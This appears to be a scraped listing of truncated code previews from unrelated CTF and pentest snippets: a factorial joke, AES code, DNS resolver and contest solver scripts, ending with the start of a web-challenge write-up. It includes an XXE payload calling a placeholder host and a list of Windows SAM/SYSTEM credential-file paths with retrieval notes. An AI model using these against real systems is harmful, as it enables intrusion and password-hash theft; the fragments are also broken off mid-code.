| #Newbie programmer | |
| def factorial(x): | |
| if x == 0: | |
| return 1 | |
| else: | |
| return x * factorial(x - 1) | |
| print factorial(6) | |
| #First year programmer, studied Pascal |
| import random | |
| def get_map(num1,num2): | |
| result = [] | |
| idx = 0 | |
| try: | |
| for x in range(num1): | |
| for y in range(num2): | |
| result.insert(idx,(x,y)) |
| from Crypto.Cipher import AES | |
| import sys | |
| import os | |
| #Initial Vector ... | |
| IV_SIZE = 16 | |
| #Block size .. | |
| BLOCK_SIZE = 16 |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| %SYSTEMDRIVE%\boot.ini | |
| %WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\system | |
| %SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
| %WINDIR%\repair\sam | |
| %WINDIR%\repair\system |
| import socket | |
| import time | |
| from twisted.internet.protocol import Factory, Protocol | |
| from twisted.internet import reactor | |
| from twisted.names import dns | |
| from twisted.names import client, server | |
| from twisted.internet import defer | |
| class MyResolver(client.Resolver): | |
| def lookupAllRecords(self, name, timeout=None): |
| import requests | |
| from bs4 import BeautifulSoup | |
| url = "https://felicity.iiit.ac.in/contest/extra/fastandfurious/" | |
| soup = BeautifulSoup(requests.get(url).text,"lxml") | |
| headers = { | |
| 'user-agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", | |
| 'content-type': "application/x-www-form-urlencoded", | |
| 'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", |
| from __future__ import division | |
| import hashlib | |
| import requests | |
| from datetime import datetime, timedelta | |
| api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}' | |
| def totimestamp(dt, epoch=datetime(1970,1,1)): | |
| td = dt - epoch | |
| return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6 |
| # coding: utf-8 | |
| """ | |
| Unfortunately solved 20 minutes after the end of the CTF :( | |
| """ | |
| import re | |
| import sys | |
| import string | |
| import requests |
You are given a URI (all happens in the http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/ route) that leads to index.php, the same but ends with index.phps and is an alleged source code of the former, finally, index.php contains a link to auth.php
index.phps listing below
<?php
session_start();
$link = @mysql_connect('localhost', '', '');
@mysql_select_db('', $link);